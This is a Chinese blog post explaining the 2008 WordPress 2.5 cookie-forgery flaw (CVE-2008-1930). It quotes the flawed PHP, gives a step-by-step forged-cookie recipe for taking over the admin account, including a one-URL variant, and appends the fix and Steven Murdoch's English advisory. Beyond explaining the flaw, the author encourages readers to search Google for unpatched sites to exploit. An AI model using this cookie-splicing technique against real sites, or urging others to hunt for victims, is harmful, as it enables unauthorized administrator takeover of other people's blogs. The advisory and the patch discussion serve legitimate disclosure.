也谈WordPress 2.5 Cookie伪造漏洞及利用方法

2008-05-09 02:51:21 0 1727
最近忙很多东西,几天前看到这个漏洞时没怎么在意,晚上突然想起来了,因为老婆那blog是WordPress 2.5的,所以我回头看了看这是个什么漏洞,看了才知道这个漏洞的博大精深(很无语的说),其实很简单...

先看看wp_generate_auth_cookie这个设置cookie的函数(在wp-includes目录下的pluggable.php中):
function wp_generate_auth_cookie($user_id, $expiration) {
        $user = get_userdata($user_id);//取得用户名
        $key = wp_hash($user->user_login . $expiration);
        $hash = hash_hmac('md5', $user->user_login . $expiration, $key);//用户名连接过期时间得到的变量进行md5得到hash
        $cookie = $user->user_login . '|' . $expiration . '|' . $hash;//cookie的组成:用户名|过期时间|hash
        return apply_filters('auth_cookie', $cookie, $user_id, $expiration);
}
再看看wp_validate_auth_cookie这个验证cookie的函数:
function wp_validate_auth_cookie($cookie = '') {
        if ( empty($cookie) ) {
                if ( empty($_COOKIE[AUTH_COOKIE]) )
                        return false;
                $cookie = $_COOKIE[AUTH_COOKIE];
        }
        $cookie_elements = explode('|', $cookie);
        if ( count($cookie_elements) != 3 )
                return false;
        list($username, $expiration, $hmac) = $cookie_elements;//通过explode'|'得到cookie中的hmac
        $expired = $expiration;
        if ( defined('DOING_AJAX') || 'POST' == $_SERVER['REQUEST_METHOD'] )
                $expired += 3600;
        if ( $expired < time() )
                return false;
        $key = wp_hash($username . $expiration);
        $hash = hash_hmac('md5', $username . $expiration, $key);//同上,获得hash
        if ( $hmac != $hash )//比较hash跟hmac的值
                return false;
        $user = get_userdatabylogin($username);
        if ( ! $user )
                return false;
        return $user->ID;
}
OK了,不仔细看应该看不出问题的所在,于是我们来看看发布的漏洞说明:

从2.5版本开始Wordpress使用加密保护的cookie认证登录用户。新的cookie形式为:

"wordpress_".COOKIEHASH = USERNAME . "|" . EXPIRY_TIME . "|" . MAC

MAC是由USERNAME和EXPIRY_TIME所生成的密钥计算得出的。由于USERNAME和EXPIRY_TIME在MAC计算中没有分隔开,因此如果USERNAME和EXPIRY_TIME连接后没有变化的话,攻击者就可以未经改变MAC便修改cookie。成功利用这个漏洞的攻击者可能以admin开始的用户名创建帐号,然后控制登录这个帐号所返回的cookie,导致获得管理帐号的控制。


这段其实是个翻译(原文见附录),点拨后应该知道该怎么利用了吧?

1.打开domain(手头就这个改cookie方便了)进入目标站点,比如:http://www.xxxx.cn/blog,注册了个新用户:admin1,登陆进去,我们可以看到cookie如下所示:

wordpress_96682eb09995fe161857abce8032f142=admin1%7C1210439650%7Cf0f9cee02f2fae3bb62885fa3fa6c1cc


(其中,%7C是|字符的URL-encoded,96682eb09995fe161857abce8032f142这是站点url的md5hash,f0f9cee02f2fae3bb62885fa3fa6c1cc是用户名+过期时间形成的字符串的md5hash)

可以看到 用户名+过期时间形成的字符串 是:admin11210439650

2.修改cookie如下所示:

wordpress_96682eb09995fe161857abce8032f142=admin%7C11210439650%7Cf0f9cee02f2fae3bb62885fa3fa6c1cc


字符串仍是:admin11210439650,可是username确实admin

3.已经是管理员啦,拥有至高无上的权利啦:)

其实都不要用cookie修改工具,直接打开:

http://www.xxxxx.cn/blog/wp-admin/async-upload.php?auth_cookie=wordpress_96682eb09995fe161857abce8032f142=admin%7C11210439650%7Cf0f9cee02f2fae3bb62885fa3fa6c1cc

就自动生成需要的cookie啦,如果PHP的request能执行内部函数那该多好,于是又一个漏洞形成...

真的很无语的漏洞,就是没耐心看代码,没本事发现,寒...google下WordPress 2.5,往后多翻翻,你会发现很多值得你玩的站...That'S ALL!

解决方法就是升级到WordPress 2.5.1,我已经把http://www.xxxxx.cn/blog给升级了...

升级后的WP代码:
$key = wp_hash($username . '|' . $expiration);
$hash = hash_hmac('md5', $username . '|' . $expiration, $key);
附录一个原始文档:

Wordpress 2.5 Cookie Integrity Protection Vulnerability

Original release date: 2008-04-25

Last revised: 2008-04-25

Latest version: http://www.cl.cam.ac.uk/users/sjm217/advisories/wordpress-cookie-integrity.txt

CVE ID: CVE-2008-1930

Source: Steven J. Murdoch <http://www.cl.cam.ac.uk/users/sjm217/>

Systems Affected:

Wordpress 2.5

Overview:

An attacker, who is able to register a specially crafted username on

a Wordpress 2.5 installation, is able to generate authentication

cookies for other chosen accounts.

This vulnerability exists because it is possible to modify

authentication cookies without invalidating the cryptographic

integrity protection.

If a Wordpress blog is configured to freely permit account creation,

a remote attacker can gain Wordpress-administrator access and then

elevate this to arbitrary code execution as the web server user.

The vulnerability is fixed in Wordpress 2.5.1

I. Description

Since version 2.5, Wordpress authenticates logged-in users through a

cryptographically protected cookie, based on papers by Fu et al [1]

and Liu et al [2]. This measure was introduced partly in response to

vulnerability CVE-2007-6013 [3,4].

The new cookies are of the form:

"wordpress_".COOKIEHASH = USERNAME . "|" . EXPIRY_TIME . "|" . MAC

Where:

COOKIEHASH:  MD5 hash of the site URL (to maintain cookie uniqueness)

USERNAME:    The username for the authenticated user

EXPIRY_TIME: When cookie should expire, in seconds since start of epoch

MAC:         HMAC-MD5(USERNAME . EXPIRY_TIME) under a key derived

from a secret and USERNAME . EXPIRY_TIME.

The flaw in this scheme is that USERNAME and EXPIRY_TIME are not

delimited in the MAC calculation. Hence the cookie may be modified,

without altering MAC, provided that the concatenation of USERNAME and

EXPIRY_TIME remains unchanged.

This class of vulnerability, the cryptographic splicing attack, was

commented on by Fu et al [1], but Wordpress does not employ their

recommended defence.

An attacker wishing to exploit this vulnerability would therefore

create an unprivileged account with its username starting with

"admin". The cookie returned on logging into this account can then be

manipulated so as to be valid for the administrator account.

II. Impact

A remote attacker, who can create an account with specially crafted

username, is able to gain administrator level access to the Wordpress

installation. Through standard techniques, this can be escalated to

arbitrary PHP code execution as the web server system user.

III. Solution

Upgrade to Wordpress 2.5.1

Workarounds:

- De-select "Anyone can register" in the Membership section of

General Settings to disable account creation.

References:

[1] Dos and Don'ts of Client Authentication on the Web,

Kevin Fu, Emil Sit, Kendra Smith, Nick Feamster

http://pdos.csail.mit.edu/papers/webauth:tr.pdf

[2] A Secure Cookie Protocol,

Alex X. Liu, Jason M. Kovacs, Chin-Tser Huang, Mohamed G. Gouda

http://www.cse.msu.edu/~alexliu/publications/Cookie/cookie.pdf

[3] Wordpress Cookie Authentication Vulnerability: CVE-2007-6013

Steven J. Murdoch,

http://www.cl.cam.ac.uk/users/sjm217/advisories/wordpress-cookie-auth.txt

[4] http://trac.wordpress.org/ticket/5367

Timeline:

2008-04-22: security@wordpress.com notified

Confirmation of receipt received

2008-04-25: Wordpress 2.5.1 released incorporating patch

Vulnerability notice published

关于作者

评论0次

要评论?请先  登录  或  注册